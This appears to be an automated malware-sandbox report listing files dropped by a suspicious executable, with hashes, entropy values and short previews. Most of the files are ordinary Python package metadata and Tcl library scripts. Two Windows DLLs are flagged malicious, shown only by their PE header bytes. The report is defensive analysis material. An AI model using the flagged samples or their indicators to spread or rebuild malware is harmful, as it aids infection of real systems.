                                                                                                                                                                                                                              Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):104
                                                                                                                                                                                                                              Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                              MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                              SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                              SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                              SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3575
                                                                                                                                                                                                                              Entropy (8bit):5.085545958857746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:D0h4aC/S802Vpnu3pyt1Q+/+DeVb0ksYSwTgD:Oc/z02Vpnu3pytS+2DeVNfSwTW
                                                                                                                                                                                                                              MD5:F659E7F578CE6FD3753871DBBBA1F939
                                                                                                                                                                                                                              SHA1:C53B0E6A2E3D94093E2FE4978926A7439B47D43C
                                                                                                                                                                                                                              SHA-256:508AE4FE43081C64B0B0A2828588B3A8CC3430C6693D1676662569400B0DFDB1
                                                                                                                                                                                                                              SHA-512:2C0496B76D259259A8F1E57F3ED2224A7E3E99FF309F764C00A8377BB5BD1C94035BDDF24BD1BA637209677CB9F4E8109F84C50B3488B5B8FC372B6BEDAB9AE0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: zipp.Version: 3.19.2.Summary: Backport of pathlib-compatible object wrapper for zip files.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/zipp.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: test.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'test'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'test'.Requir
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1039
                                                                                                                                                                                                                              Entropy (8bit):5.8094923667268965
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:An/2zDlvbqfuiwbWk/EsJ6Xam9lpW8OWq3tW36nJA3u3iWwksYW:AnuXlzUuitk/5J6f9lpW8OW4tM6nJSkE
                                                                                                                                                                                                                              MD5:1E77310EF3277C93430D969FEAC8FDFC
                                                                                                                                                                                                                              SHA1:173240337F249E2A6D54206AA0D0ACB0FDED12D7
                                                                                                                                                                                                                              SHA-256:F316F2E03FD9ADE7EBBC0B154706848E2BB8FD568B90935109F0D8E3CE2B9BFE
                                                                                                                                                                                                                              SHA-512:68F752DAF2DBEB79644337E4DB9B8CEAEAE3606A865EDC32BE16785DC97BDCF38EF200F0EDC86DC9D71ABA72E108D2851A510F0EB598FFEA286503F0C9772E5E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:zipp-3.19.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..zipp-3.19.2.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..zipp-3.19.2.dist-info/METADATA,sha256=UIrk_kMIHGSwsKKChYizqMw0MMZpPRZ2ZiVpQAsN_bE,3575..zipp-3.19.2.dist-info/RECORD,,..zipp-3.19.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp-3.19.2.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..zipp-3.19.2.dist-info/top_level.txt,sha256=iAbdoSHfaGqBfVb2XuR9JqSQHCoOsOtG6y9C_LSpqFw,5..zipp/__init__.py,sha256=QuI1g00G4fRAcGt-HqbV0oWIkmSgedCGGYsHHYzNa8A,13412..zipp/__pycache__/__init__.cpython-312.pyc,,..zipp/__pycache__/glob.cpython-312.pyc,,..zipp/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp/compat/__pycache__/__init__.cpython-312.pyc,,..zipp/compat/__pycache__/py310.cpython-312.pyc,,..zipp/compat/py310.py,sha256=eZpkW0zRtunkhEh8jjX3gCGe22emoKCBJw72Zt4RkhA,219..zipp/glob.py,sha256=etWpnfEoRyf
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5
                                                                                                                                                                                                                              Entropy (8bit):1.9219280948873623
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:m:m
                                                                                                                                                                                                                              MD5:9B929466EC7848714DE24BCF75AE57CB
                                                                                                                                                                                                                              SHA1:ECC9237295CDA9B690BE094E58FAE1458A4B0389
                                                                                                                                                                                                                              SHA-256:8806DDA121DF686A817D56F65EE47D26A4901C2A0EB0EB46EB2F42FCB4A9A85C
                                                                                                                                                                                                                              SHA-512:C8D8967BE2B5094A5D72BA4BEF5DBDA2CBF539BF3B8B916CF86854087A12DF82B51B7BF5B6EFA79898692EFD22FAD9688058448CAAB198FB708A0E661DC685EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:zipp.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1816344
                                                                                                                                                                                                                              Entropy (8bit):6.495049871908257
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:CAZ2kQrvqkPY6i6ktWc2uMOxmWu1/0lglMkgshwlfjwtorWy2eMdPhOC9JlQ5ZDR:CA0W9jEoSy2nd9JlQjaq5vWHZ7XM2eDD
                                                                                                                                                                                                                              MD5:3AE729942D15F4F48B1EA8C91880F1F4
                                                                                                                                                                                                                              SHA1:D27596D14AF5ADEB02EDAB74859B763BF6AC2853
                                                                                                                                                                                                                              SHA-256:FE62CA2B01B0EC8A609B48F165CA9C6A91653D3966239243AD352DD4C8961760
                                                                                                                                                                                                                              SHA-512:355800E9152DAAD675428421B867B6D48E2C8F8BE9CA0284F221F27FAE198C8F07D90980E04D807B50A88F92FFB946DC53B7564E080E2E0684F7F6CCC84FF245
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......1.y+u..xu..xu..x...yw..x...xv..x...yx..x...y}..x...yq..x..yw..x|..xg..x...yt..x...yx..xu..x]..x...y...x...yt..x...xt..x...yt..xRichu..x........................PE..d...1,.c.........." ...!.............................................................j....`..............................................`.. _..h.......8................/..........................................`...@............0...............................text............................... ..`.rdata..|L...0...N..................@..@.data...."...........f..............@....pdata...............n..............@..@.rsrc...8............f..............@..@.reloc...............j..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11707
                                                                                                                                                                                                                              Entropy (8bit):5.03328629946697
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:rXlm2LnoZ7k2mOEhYoKVtWD2xLsmF+MNlPQ4lJ+B0O0DgryYY/+zy7go:rXlm2Lng7kvF2VtWD2xLeMNT+B0O0Urk
                                                                                                                                                                                                                              MD5:A0B269D76DB613C2D927EFA84FEE88E2
                                                                                                                                                                                                                              SHA1:F9C7AD375F4D4223F0668FA1E2C4E5A83CAC2D03
                                                                                                                                                                                                                              SHA-256:32348D51F3637F375B056FE99E9B4D89D85D45DB907847DC370BD72812A2E2FE
                                                                                                                                                                                                                              SHA-512:5427762147825DC2ED3FEEE4011BBF2100932A4D93F3242CCAD15499C9DC39F42A82AEB42ED5DB5839560CD7AAE5D30621AC3694552FFC650A1F572CEE32FA54
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Heuristics to assemble a platform identifier from publicly available..# information. The identifier describes the platform of the currently..# running tcl shell. This is a mixture of the runtime environment and..# of build-time properties of the executable itself...#..# Examples:..# <1> A tcl shell executing on a x86_64 processor, but having a..# wordsize of 4 was compiled for the x86 environment, i.e. 32..# bit, and loaded packages have to match that, and not the..# actual cpu...#..# <2> The hp/solaris 32/64 bit builds of the core cannot be..# distinguished by looking at tcl_platform. As packages have to..# match the 32/64 information we have to look in more places. In..# this case we inspect the executable itself (magic numbers,..# i.e. fileutil::magic::filetype)...#..# The basic information used comes out of the 'os' and 'machine'..# entries of the 'tcl_platform' array. A number of general and
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6218
                                                                                                                                                                                                                              Entropy (8bit):4.843141834641668
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:PV5U+VLnNUPVvH+knNUPVUHD5ngWftN+IgMufIdqi+g0SYiCXVDjqL:Nm6MFXN5uwq51iCFD2
                                                                                                                                                                                                                              MD5:8ABC3029963E433D1D9865AAA7E1057B
                                                                                                                                                                                                                              SHA1:A88091DC98B2FD0AE3A258B59F8BE43F41F04323
                                                                                                                                                                                                                              SHA-256:0A6B4B109CFDFC4B40FBDEFDB2282F9B1AF3CC2F9624DD39958EEBD78781AFB2
                                                                                                                                                                                                                              SHA-512:D5068375615A2200DDC13EEB852B2E21B7E4AA416FB7A0E97C98B8B106D7701792C523739E8BF266D2ABE411D4298A0B5B3884CFB9DF820FD4A2B61B22F9DECF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Higher-level commands which invoke the functionality of this package..# for an arbitrary tcl shell (tclsh, wish, ...). This is required by a..# repository as while the tcl shell executing packages uses the same..# platform in general as a repository application there can be..# differences in detail (i.e. 32/64 bit builds).....# ### ### ### ######### ######### #########..## Requirements....package require platform..namespace eval ::platform::shell {}....# ### ### ### ######### ######### #########..## Implementation....# -- platform::shell::generic....proc ::platform::shell::generic {shell} {.. # Argument is the path to a tcl shell..... CHECK $shell.. LOCATE base out.... set code {}.. # Forget any pre-existing platform package, it might be in.. # conflict with this one... lappend code {package forget platform}.. # Inject our platform package.. lappend code [list source $base]..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35136
                                                                                                                                                                                                                              Entropy (8bit):4.945501767273492
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:m3xQvCzasI/rHPG2yfkZ0Kbh91iQ3Lnq5MIVYB8mbgijsPIWtw4qvUm:4xQvCzasIDHPG2yW0kJ32imXmUij6JjG
                                                                                                                                                                                                                              MD5:BD4FF2A1F742D9E6E699EEEE5E678AD1
                                                                                                                                                                                                                              SHA1:811AD83AFF80131BA73ABC546C6BD78453BF3EB9
                                                                                                                                                                                                                              SHA-256:6774519F179872EC5292523F2788B77B2B839E15665037E097A0D4EDDDD1C6FB
                                                                                                                                                                                                                              SHA-512:B77E4A68017BA57C06876B21B8110C636F9BA1DD0BA9D7A0C50096F3F6391508CF3562DD94ACEAF673113DBD336109DA958044AEFAC0AFB0F833A652E4438F43
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# msgcat.tcl --..#..#.This file defines various procedures which implement a..#.message catalog facility for Tcl programs. It should be..#.loaded with the command "package require msgcat"...#..# Copyright (c) 2010-2015 Harald Oehlmann...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 1998 Mark Harrison...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.5-..# When the version number changes, be sure to update the pkgIndex.tcl file,..# and the installation directory in the Makefiles...package provide msgcat 1.6.1....namespace eval msgcat {.. namespace export mc mcexists mcload mclocale mcmax mcmset mcpreferences mcset\.. mcunknown mcflset mcflmset mcloadedlocales mcforgetpackage\... mcpackageconfig mcpackagelocale.... # Records the list of locales to search.. variable Loclist {}.... # List of currently loaded locales.. variable LoadedLoc
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):107674
                                                                                                                                                                                                                              Entropy (8bit):4.841458743618635
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:74s6YTLsaoi4N8uBPM5PP9AlGXJL/ciBh:7N6Y9oi4N8uBPM5PP9AYXJL/ciBh
                                                                                                                                                                                                                              MD5:655EC828777244F9F048E0D08203482F
                                                                                                                                                                                                                              SHA1:790446D04FE7BE12FD5DCF6E6FBD4C5A08C45C98
                                                                                                                                                                                                                              SHA-256:35A88F56DF57E6AC6F2CCC4D193210FBB9BD224AC99670603E077DDF8C5610BC
                                                                                                                                                                                                                              SHA-512:C249CAA5DA76A0B0876DD1BD201FF2D249D4FCD8467992C9DE51BA5A1C5471F98C10D69C46DF5B25DBA7941F4301B446D90CBF17BCCFB8B0ED27B22BF4DA20F3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# tcltest.tcl --..#..#.This file contains support code for the Tcl test suite. It..# defines the tcltest namespace and finds and defines the output..# directory, constraints available, output and error channels,..#.etc. used by Tcl tests. See the tcltest man page for more..#.details...#..# This design was based on the Tcl testing approach designed and..# initially implemented by Mary Ann May-Pumphrey of Sun..#.Microsystems...#..# Copyright . 1994-1997 Sun Microsystems, Inc...# Copyright . 1998-1999 Scriptics Corporation...# Copyright . 2000 Ajuba Solutions..# Contributions from Don Porter, NIST, 2002. (not subject to US copyright)..# All rights reserved.....package require Tcl 8.5-..;# -verbose line uses [info frame]..namespace eval tcltest {.... # When the version number changes, be sure to update the pkgIndex.tcl file,.. # and the install directory in the Makefiles. When the minor version.. # changes (new feature) be sure to update the man page
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118419
                                                                                                                                                                                                                              Entropy (8bit):4.888789841897662
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:RYY1IO/KuUhIW17zr1DLJuuBuFsj6aIsGc3e6xGxjndp72y4ebBxIQ30Ik:RbyOCuUv9r5LJmsjlxTxGxjndpCBeAQ0
                                                                                                                                                                                                                              MD5:ACB85FEB97B27F1362E1D76B686D498F
                                                                                                                                                                                                                              SHA1:92C370F838BD67C72E153FBF7AD05E26FF40A393
                                                                                                                                                                                                                              SHA-256:7A30E7A49C1F6939537EB7A80CF2F5BC7A4969F2B2AD99BA4E26DB85BBC2FCC7
                                                                                                                                                                                                                              SHA-512:EA504863386817E1B21549376148FD05C7EAF74F91A3A8DA97EFCF3784530ED3CF1910DF9B2431EC47D1175759CDEB1A0E9E9E02BBA94EC2123EAFB7CBD2B90A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# http.tcl --..#..#.Client-side HTTP for GET, POST, and HEAD commands. These routines can..#.be used in untrusted code that uses the Safesock security policy...#.These procedures use a callback interface to avoid using vwait, which..#.is not defined in the safe base...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.6-..# Keep this in sync with pkgIndex.tcl and with the install directories in..# Makefiles..package provide http 2.9.8....namespace eval http {.. # Allow resourcing to not clobber existing data.... variable http.. if {![info exists http]} {...array set http {... -accept */*... -pipeline 1... -postfresh 0... -proxyhost {}... -proxyport {}... -proxyfilter http::ProxyRequired... -repost 0... -urlencoding utf-8... -zip 1...}...# We need a useragent string of this style or various servers will...# refuse to send us compressed content
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1555736
                                                                                                                                                                                                                              Entropy (8bit):6.1820383306760185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:gJ3uXVFKflt2zwvzPYHURwgVdF9EWyCzfdmHQnveD4CGan9nViFoHb15K3cmwdbo:yeFSpvzg0RwgVdF9EWyCzfdmHQnveD4Z
                                                                                                                                                                                                                              MD5:966580716C0D6B7EEC217071A6DF6796
                                                                                                                                                                                                                              SHA1:E3D2D4A7EC61D920130D7A745586CEB7AAD4184D
                                                                                                                                                                                                                              SHA-256:AFC13FCE0690C0A4B449EC7ED4FB0233A8359911C1C0BA26A285F32895DBB3D2
                                                                                                                                                                                                                              SHA-512:CF0675EA888A6D1547842BCFB27D45815B164337B4A285253716917EB157C6DF3CC97CBA8AD2AB7096E8F5131889957E0555BAE9B5A8B64745AC3D2F174E3224
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.P.=n>.=n>.=n>...?.?n>...;.1n>...:.5n>...=.9n>...:.>n>...:.<n>.4...-n>...?.(n>.=n?.wo>...6..n>...>.<n>.....<n>...<.<n>.Rich=n>.................PE..d...],.c.........." ...!............|...............................................4=....`..........................................?..L@..,...|........{...P..D......../.......E...T...............................S..@...............@............................text...h........................... ..`.rdata..0...........................@..@.data...............................@....pdata..D....P......................@..@.rsrc....{.......|..................@..@.reloc...E.......F...H..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1130
                                                                                                                                                                                                                              Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
